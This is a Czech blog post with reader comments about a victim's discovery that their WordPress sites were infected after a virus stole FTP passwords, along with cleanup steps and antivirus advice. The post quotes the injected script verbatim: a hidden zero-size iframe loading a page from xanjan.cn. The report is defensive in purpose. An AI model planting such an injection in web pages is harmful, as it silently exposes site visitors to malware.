Dneska mi večer napsal na webtrhu Morasino PM, že mám na stránce nějaký divný kus kódu. Okamžitě na to koukám a má pravdu. Popadá mě panika, ale jakž takž zachovávám chladnou hlavu. Snad to je jen nějaká vadná url co se přidala s nějakým příspěvkem. Bouhžel problém je daleko závažnější než si jen vůbec dokážu připustit.
Většina důležitých souborů byla změněna tím že se na konec přidal následující kus kódu:
———-
<script language=javascript>status=location;document.write(‘<iframe src=”http://xanjan.cn/in.cgi?666″ width=0 height=0 frameborder=0 onLoad=”status=defaultStatus;”></iframe>’);</script>
———-
Okamžitě mě napadlo, že to je chyba WordPressu a někdo asi našel nějakou díru. Rychle teda kus kódu zadávám do googlu, aby jsem zjistil co se děje. K mému údivu moc informací nenacházím. Takže nastal čas udělat nějaké rychlé rozhodnutí a analýzu problému. Zkouším ostatní blogy. Ten samí problém. Skoro všude je přidaný ten kus kódu. Zkouším ostatní hostingy a skoro u všech souborů index.php, main.php, header.php nebo footer.php je přidaný tento kus kódu. Toto není chyba hostingu nebo WP. Někde jsem čapnul nějaký virus a ten poharvestovat moje přihlašovací údaje v Total Commanderu. Okamžitě se mi vybaví jeden příspěvek na webtrhu, kde mi NOD32 na pár minut doslova zablokoval počítač. V tom příspěvku jsem sice zlikvidoval odkaz, ale NOD32 mi při přesunu souborů do karantény poškodil celkem velké množství souborů. Ty se mi po 4 hodinách podařilo dát dohromady ze zálohy. Nějak mě nenapadlo, že se virus mohl dostat ven, naharvestovat hesla a někam je poslat. Takže analýzu problému mám za sebou nastal čas jednat. Postupně na každém hostingu opravím soubory, které byly v poslední době editované a měním FTP hesla. V total commanderu nechám ty staré, nové jdou pěkně na papír. Po zhruba 2 hodinách mám hotovo. Opravené (snad) všechny infikované soubory na každém hostingu. Na goddady mám velké množství domén, tak snad jsem fixnul všechny. Chvilku jsem přemýšlel, že by jsem si na to napsal nějaký skript, který by na hostingu postupně prošel všechny soubory a otestoval je na přítomnost nebezpečného řetězce. Bouhžel by to bylo časově příliš náročné a bylo nutné jednat rychle, ale přemýšlím že něco takového přece jen napíšu. Do budoucna by se to určitě hodilo. Upřimně by mě zajímalo kolik stránek má na stránce ten kus kódu a co vlastně dělá. Já by jsem si zase měl asi poříd k NOD32 (mám originální verzi žádný crack) a SpyBotu (ten je free) ještě nějaký Firewall, který bude kontrolovat věci co odchází.
Mluvis mi z duse, ja menil hesla vsude predevcirem a TC jsem nahradil jinym klientem :) Ne ze bych ten vir sam mel, ale ftp ktery sem daval redaktorovi u jednoho webu bylo co kazdy 2 tejdny zavirovany a nechce se mi riskovat :)
Napsat nakej ten checker nemusi bejt uplne hracka, protoze ten kus javascriptu neni pokazdy stejnej (ja sem mel kuprikladu uplne jinej nez mas ty), ale mozna se da spolehnout na to, ze skodlivej kod je vzdycky uplne na konci souboru (aspon ten muj vzdycky byl)
Koukam ze mam jednu z variant taky ulozenou, bohuzel ten njan.cn tam vubec neni (je to cely takova divna kombinace znaku). Jestli to harvestuje i neco mimo TC tak se jenom modlim ze jsem to nikdy nemel (mel jsem doted ulozeny heslo do bankovnictvi ve wandu :)). U me to poprvy nod32 detekoval na infikovanym webu a pres ftp me to nenechal stahnout, jestli jsem to sam nekdy mel na kompu nevim. Ty novejsi varianty nedetekuje nikde..
Naštvaný a dost bezmocný jsem něoc začal psát. Jsem ale dost unavený na nějaké složitější aplykace, takže zatím mám jen skript co prohledá adresáře na řetezec njan.cn což je část co se nejvíce vyskytuje (alespoň podle googlu), předtím je nějaký podivný kus IDN či co.
Podle všeho to má člověk v kompu a harvestuje to hesla z Total Commanderu a podobných věcech. Doufám že jen FTP, mám trochu strach o maily, paypal, popřípadě hesla z prohlížečů. Dost mě sklamal NOD32, že to nezastavil. Za 3 roky co mám placenou verzi je to první sklamání.
Hehehe, pekne. Hlavne to ako sa to stalo. Virus ukradol hesla na http://ftp... dost vymakane. Btw. radsej pouzivat scp a bez ulozenych hesiel ;)
Ale k veci. K zdrojaku tomu javascriptu sa bohuzial dostat neviem, ale tipujem to na XSS (cross site scripting) utok. Ide o to, ze ten kusok kodu v tvojich strankach bol schopny ukradnut cookies navstevnikov tvojich stranok a takisto aj tvoje. Da sa to pouzit na ukradnutie identity. Pri tvojom blogu to nemusi mat fatalny nasledok, ale pri inych strankach ano. Atd, atd…
Napisem o tom post na moj blog asi, dik za inspiraciu ;)
Jen napiš, na česko/slovenském internetu se o tomhle vůbec nepíše. Když sem hledal ten kus řetězce na seznamu tka to našlo jen nějakou hacknutou stránku :)
Jojo, tento virus je docela známý, ale je blbé, že se proti tomu moc nedá bránit (teda, pokud ho antivir nenajde) a zjistíte to až za nějakou dobu po nakažení stránky.
tu:
http://forums.whirlpool.net.au/forum-replies-archive.cfm/1060408.html
a tu:
http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
na toto odporucam aviru velmi dobry antivir nieco podobne mi hlasilo aj na czechmoney fore a nedavno sa nieco podobne hlasilo aj na domaineri v teme teda nie na fore, ale bola o tom tema a tiez mal user aviru, zistilo sa ze ma na blogu iframe.
inak odporucam este citat http://blog.synopsi.com/2008-06-28/pouzivate-wordpress-opravte-si-potencionalnu-bezpecnostnu-zranitelnost-v-dizajne
a http://blog.synopsi.com/2008-02-20/11-tipov-ako-si-zabezpecit-blog
Si rikam, co mi to tu blika, jsem se na 404 nemohl dostat, expoit virus, expoit virus :-D
Porid si AVG, sice ti objevi kazdou ptakovinu, ja mam par veci vypnutych, ale je nejlepsi a hlavne levny. Ja ho kupuju s casopisem CHIP.
Ještě že jsem v tomhle s Linuxem relativně za vodou.
Ak chceš firewall a si spokojný s NOD32, vyskusaj ESET Smart Security,
“optimalizované riešenie integrujúce štyri funkcionality(antivirus, antispyware, firewall a antispam)].”
Odporúčam, je možné vyskúšať skúšobnú verziu na 30 dní zadarmo.
http://www.eset.eu/produkty/eset-smart-security
s tým vírom som mal problém aj ja a nebolo mi všetko jedno
Hmm it seems like your blog ate my first comment (it was super long) so I guess I’ll just sum it up what I wrote and say, I’m thoroughly enjoying your blog. I as well am an aspiring blog blogger but I’m still new to everything. Do you have any helpful hints for newbie blog writers? I’d genuinely appreciate it.